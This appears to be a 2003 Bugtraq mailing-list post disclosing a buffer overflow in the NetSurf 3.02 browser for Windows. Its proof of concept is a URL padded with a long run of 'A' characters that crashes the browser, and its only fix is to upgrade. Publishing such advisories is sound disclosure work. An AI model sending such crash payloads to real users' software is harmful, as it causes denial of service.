Bugtraq mailing list archives

Buffer Overflow in NetSurf 3.02

From: "nimber" <nimber () mail ru>
Date: Mon, 11 Aug 2003 22:26:23 +0400


#################################
# ZUD SECURITY TEAM PRESENT     #
################################                               
#    bug found by nimber        #
# Email : nimber () designer ru    #
# Site:    www.zudteam.org      #
# HomePage: www.nimber.plux.ru  #         
#          7.08.2003            #
################################
Application: NetSurf
Versions: 3.02 (and all?)
Platform: Windows
Web Site: www.klodware.narod.ru
          www.klodware.nm.ru
Bug: Buffer Overflow.
Exploit(exaple): 
Crash browser by sending long http request.
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#################################
#Fix: Download new version.     #
################################

Current thread:

phpWebSite SQL Injection & DoS & XSS Vulnerabilities Lorenzo Hernandez Garcia-Hierro (Aug 11)
- Buffer Overflow in NetSurf 3.02 nimber (Aug 11)